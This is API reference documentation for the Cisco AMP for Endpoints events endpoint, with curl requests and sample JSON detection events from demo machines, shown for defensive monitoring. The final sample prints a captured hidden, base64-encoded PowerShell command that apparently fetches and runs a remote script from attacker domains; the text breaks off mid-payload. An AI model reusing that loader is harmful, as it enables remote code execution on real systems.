Cisco AMP for Endpoints API

GET /v0/events

Description

This is a general query interface for events. This is analogous to the Events view on the FireAMP Console.

Events can be filtered by a variety of criteria. Each criteria type is logically ANDed with the other criteria; each selection of a criteria is logically ORed. For example: with the query string: connector_guid[]=ead39d47-93bd-4230-b692-454b433faf96&event_type[]=2164260868&event_type[]=1090519054, it will return any events that match the connector guid ad39d47-93bd-4230-b692-454b433faf96 AND any events with type (1090519054 OR 2164260868).

The arguments passed to the event_type and group_guid parameters can be retrieved from their respective endpoints.

Query Parameters

Name Type Example Values Description
detection_sha256 String f8a6a244138cb1e2f044f63f3dc42beeb555da892bbd7a121274498cbdfc9ad5
application_sha256 String 80ef843fa78c33b511394a9c7535a9cbace1deb2270e86ee4ad2faffa5b1e7d2
limit Integer 1, 2, 10
connector_guid[] GUID af73d9d5-ddc5-4c93-9c6d-d5e6b5c5eb01
group_guid[] GUID b077d6bc-bbdf-42f7-8838-a06053fbd98a
start_date String (Time ISO8601) 2015-10-01T00:00:00+00:00 Inclusive (The list will include events that match start_date)
offset Integer 10
event_type[] Array 1090519054, 1090519084

Show Response Fields

Name Type Description
version String
metadata.links.self String
metadata.links.prev String
metadata.links.next String
metadata.results.total Integer
metadata.results.current_item_count Integer
metadata.results.index Integer
metadata.results.items_per_page Integer
data Array
data[].id Integer
data[].timestamp Integer
data[].timestamp_nanoseconds Integer
data[].date String (Time ISO8601)
data[].event_type String
data[].event_type_id Integer
data[].detection String
data[].detection_id String
data[].group_guids Array
data[].group_guids[] GUID
data[].computer.connector_guid GUID
data[].computer.hostname String
data[].computer.external_ip String
data[].computer.user String
data[].computer.active Boolean
data[].computer.network_addresses Array
data[].computer.network_addresses[].ip String
data[].computer.network_addresses[].mac String
data[].computer.links.computer String
data[].computer.links.trajectory String
data[].computer.links.group String
data[].file.disposition String
data[].file.file_name String
data[].file.file_path String
data[].file.identity.sha256 String
data[].file.identity.sha1 String
data[].file.identity.md5 String
data[].file.parent.process_id Integer
data[].file.parent.disposition String
data[].file.parent.file_name String
data[].file.parent.identity.sha256 String
data[].file.parent.identity.sha1 String
data[].file.parent.identity.md5 String
Write
Preview

Examples

Fetch list of events sorted in descending order by timestamp
Fetch list of events filtered by connector_guid
Fetch list of events filtered by group_guid
Fetch list of events filtered by detection_sha256 and application_sha256
Fetch list of events filtered by event_type
Fetch list of Behavioral Protection Detection events
Fetch events that are newer than a given timestamp
Fetch list of events filtered by SCAN_STARTED event type

Fetch list of events sorted in descending order by timestamp

Request

Requires Authorization
GET /v0/events?limit=2
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?limit=2'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1976
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2830
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"5bde671776a159b21ee4fa7f532d5674"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?limit=2",
      "next": "https://api.eu.amp.cisco.com/v0/events?limit=2&offset=2"
    },
    "results": {
      "total": 975,
      "current_item_count": 2,
      "index": 0,
      "items_per_page": 2
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1620256838,
      "timestamp_nanoseconds": 279000000,
      "date": "2021-05-05T23:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
        "hostname": "Demo_Upatre",
        "external_ip": "49.223.159.99",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "124.144.186.238",
            "mac": "d6:bb:ea:b6:98:4a"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      }
    },
    {
      "id": 6180351977805840000,
      "timestamp": 1620256806,
      "timestamp_nanoseconds": 548000000,
      "date": "2021-05-05T23:20:06+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180351977805840385",
      "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
        "hostname": "Demo_Upatre",
        "external_ip": "49.223.159.99",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "124.144.186.238",
            "mac": "d6:bb:ea:b6:98:4a"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      }
    }
  ]
}

Fetch list of events filtered by connector_guid

Request

Requires Authorization
GET /v0/events?connector_guid%5B%5D=99f403ce-bee9-4b7a-97f0-c3e39e39078c&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?connector_guid%5B%5D=99f403ce-bee9-4b7a-97f0-c3e39e39078c&limit=1'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1974
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2829
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"0d1a3dbc3f2dc80cb57213ec2ab55d90"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?connector_guid%5B%5D=99f403ce-bee9-4b7a-97f0-c3e39e39078c&limit=1",
      "next": "https://api.eu.amp.cisco.com/v0/events?connector_guid%5B%5D=99f403ce-bee9-4b7a-97f0-c3e39e39078c&limit=1&offset=1"
    },
    "results": {
      "total": 34,
      "current_item_count": 1,
      "index": 0,
      "items_per_page": 1
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1620256838,
      "timestamp_nanoseconds": 279000000,
      "date": "2021-05-05T23:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
        "hostname": "Demo_Upatre",
        "external_ip": "49.223.159.99",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "124.144.186.238",
            "mac": "d6:bb:ea:b6:98:4a"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      }
    }
  ]
}

Fetch list of events filtered by group_guid

Request

Requires Authorization
GET /v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1973
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2828
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"677fa441bf5906804820b16ce3ff823f"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1",
      "next": "https://api.eu.amp.cisco.com/v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1&offset=1"
    },
    "results": {
      "total": 279,
      "current_item_count": 1,
      "index": 0,
      "items_per_page": 1
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1620256838,
      "timestamp_nanoseconds": 279000000,
      "date": "2021-05-05T23:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
        "hostname": "Demo_Upatre",
        "external_ip": "49.223.159.99",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "124.144.186.238",
            "mac": "d6:bb:ea:b6:98:4a"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      }
    }
  ]
}

Fetch list of events filtered by detection_sha256 and application_sha256

Request

Requires Authorization
GET /v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1971
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2827
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"43edcc73840ac14aab1427b42803d4aa"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1",
      "next": "https://api.eu.amp.cisco.com/v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1&offset=1"
    },
    "results": {
      "total": 2,
      "current_item_count": 1,
      "index": 0,
      "items_per_page": 1
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1620256838,
      "timestamp_nanoseconds": 279000000,
      "date": "2021-05-05T23:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
        "hostname": "Demo_Upatre",
        "external_ip": "49.223.159.99",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "124.144.186.238",
            "mac": "d6:bb:ea:b6:98:4a"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      }
    }
  ]
}

Fetch list of events filtered by event_type

Request

Requires Authorization
GET /v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1971
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2826
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"f80e7bf82de8d3912fb66af4ca683088"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10",
      "prev": "https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&limit=10&offset=0",
      "next": "https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&limit=10&offset=20"
    },
    "results": {
      "total": 606,
      "current_item_count": 10,
      "index": 10,
      "items_per_page": 10
    }
  },
  "data": [
    {
      "id": 6533671385032557000,
      "timestamp": 1620253659,
      "timestamp_nanoseconds": 14000000,
      "date": "2021-05-05T22:27:39+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.File.MalParent",
      "detection_id": "6533671380737589309",
      "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
      "group_guids": [
        "6a208a97-badf-4296-87c2-40779ffff0af"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
        "hostname": "Demo_AMP_Threat_Audit",
        "external_ip": "21.207.234.38",
        "user": "johndoe",
        "active": true,
        "network_addresses": [
          {
            "ip": "238.85.81.101",
            "mac": "9e:47:ce:f6:82:2c"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "ekjrngjker.exe",
        "file_path": "C:\\ekjrngjker.exe",
        "identity": {
          "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
          "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
          "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
        }
      }
    },
    {
      "id": 6533671380737589000,
      "timestamp": 1620253658,
      "timestamp_nanoseconds": 605000000,
      "date": "2021-05-05T22:27:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.File.MalParent",
      "detection_id": "6533671380737589308",
      "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
      "group_guids": [
        "6a208a97-badf-4296-87c2-40779ffff0af"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
        "hostname": "Demo_AMP_Threat_Audit",
        "external_ip": "21.207.234.38",
        "user": "johndoe",
        "active": true,
        "network_addresses": [
          {
            "ip": "238.85.81.101",
            "mac": "9e:47:ce:f6:82:2c"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "ekjrngjker.exe",
        "file_path": "C:\\ekjrngjker.exe",
        "identity": {
          "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
          "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
          "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
        }
      }
    }
  ]
}

Fetch list of Behavioral Protection Detection events

Request

Requires Authorization
GET /v0/events?event_type%5B%5D=553648222&limit=2
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=553648222&limit=2'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1971
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2825
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"c79587a5226d5bbc2d8bd1b46b543711"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=553648222&limit=2",
      "next": "https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=553648222&limit=2&offset=2"
    },
    "results": {
      "total": 18,
      "current_item_count": 2,
      "index": 0,
      "items_per_page": 2
    }
  },
  "data": [
    {
      "id": 6880683125978957000,
      "timestamp": 1620188084,
      "timestamp_nanoseconds": 791000000,
      "date": "2021-05-05T04:14:44+00:00",
      "event_type": "Threat Detection",
      "event_type_id": 553648222,
      "detection": "PowerShell Download String",
      "connector_guid": "2c846819-d267-4b76-9225-3709b97e3f78",
      "group_guids": [
        "3aef61ae-a41f-4a89-a47d-1ce96164eea8"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "2c846819-d267-4b76-9225-3709b97e3f78",
        "hostname": "Demo_BP_WMIPRVSE",
        "external_ip": "145.238.35.100",
        "active": true,
        "network_addresses": [
          {
            "ip": "166.65.137.252",
            "mac": "8a:26:b5:30:1f:04"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/2c846819-d267-4b76-9225-3709b97e3f78",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/2c846819-d267-4b76-9225-3709b97e3f78/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "bp_data": {
        "audit": false,
        "details": {
          "actions": [

          ],
          "eng_epoch": 1,
          "eng_ver": "0.9.0.104",
          "matched_activity": {
            "events": [
              {
                "process:start": {
                  "app": "powershell.exe",
                  "app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
                  "args": [
                    "powershell.exe",
                    "-NoP"
                  ],
                  "cmd_line": "powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUA